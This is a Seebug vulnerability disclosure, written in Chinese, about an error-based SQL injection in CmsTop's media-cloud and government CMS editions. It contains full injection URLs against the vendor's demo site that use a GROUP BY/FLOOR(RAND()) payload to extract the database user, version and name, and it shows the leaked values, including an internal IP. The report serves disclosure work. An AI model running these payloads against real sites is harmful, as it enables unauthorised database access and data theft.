CmsTop媒体云&政务版SQL报错注入漏洞(XPATH)

2015-11-03T00:00:00
ID SSV:96142
Type seebug
Reporter Root
Modified 2015-11-03T00:00:00

Description

简要描述:

RT 多个参数存在隐患 注入比较隐蔽~

详细说明:

CMSTOP比较难挖 WooYun: CMSTOP媒体云&政务版SQL报错注入漏洞(XPATH) 厂商官网:http://www.cmstop.com/ 产品涉及:

CmsTop 媒体版 面向媒体提供“PC站+手机站+手机端+平板端”多终端一体化新媒体技术解决方案,助力媒体融合转型。 媒体云 CmsTop 媒体云 作为媒体云时代的开创者,思拓合众颠覆了传统的软件采购和项目外包模式,与传媒集团建立战略合作伙伴关系,以互联网思维和云计算技术为基础整合集团、区域和行业内的媒体及政务新媒体资源,共同建设和运营媒体云。 政务版 CmsTop 政务版 面向党政部门提供多终端一体化的网站群私有云技术解决方案,助力党政部门打造“两微一端”政务新媒体。

在线演示站点:

http://www.cmstop.cn/

这处SQL出在上传附件处。。。 第一步,需要注册,内部子项功能比较多

<img src="https://images.seebug.org/upload/201511/031046373b34f6274530d45c5f1b9eae2b533754.png" alt="1103-SQL.png" width="600" onerror="javascript:errimg(this);">

然后就找到某子项,上传附件处,抓包 正常数据包:

<img src="https://images.seebug.org/upload/201511/031043509af12ee75c2d03bebf12607615969525.png" alt="1103-SQL-OK.png" width="600" onerror="javascript:errimg(this);">

注入地址:

http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250&height=100

多个参数可注入,如:tags、size、width、height 开发测试可能忽略了这一处

<img src="https://images.seebug.org/upload/201511/0310471077a7f5ce7bf592b448e9f3b3204cc92f.png" alt="1103-SQL-1.png" width="600" onerror="javascript:errimg(this);">

证明其中一个参数 随便挑一个参数:width 提交:

http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100

<img src="https://images.seebug.org/upload/201511/031048115886e6bbd526d28ba13d212d430c495a.png" alt="1103-SQL-11.png" width="600" onerror="javascript:errimg(this);">

注出用户:

site_11701@10.162.64.228

再注一下版本:

http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(version(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100

<img src="https://images.seebug.org/upload/201511/03104924df65ebc937490156dcc4ee244e69402b.png" alt="1103-SQL-10.png" width="600" onerror="javascript:errimg(this);">

版本:

5.6.20-log

被前人找到漏洞以后厂商进行了相关修复,把一些配置信息改了

http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(version(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100

<img src="https://images.seebug.org/upload/201511/031055427e8c87756976082f08ebcf806e0810f2.png" alt="1103-SQL-13.png" width="600" onerror="javascript:errimg(this);">

数据库名被改为:

site_MDAwMDExN1zAx1

漏洞证明:

已证明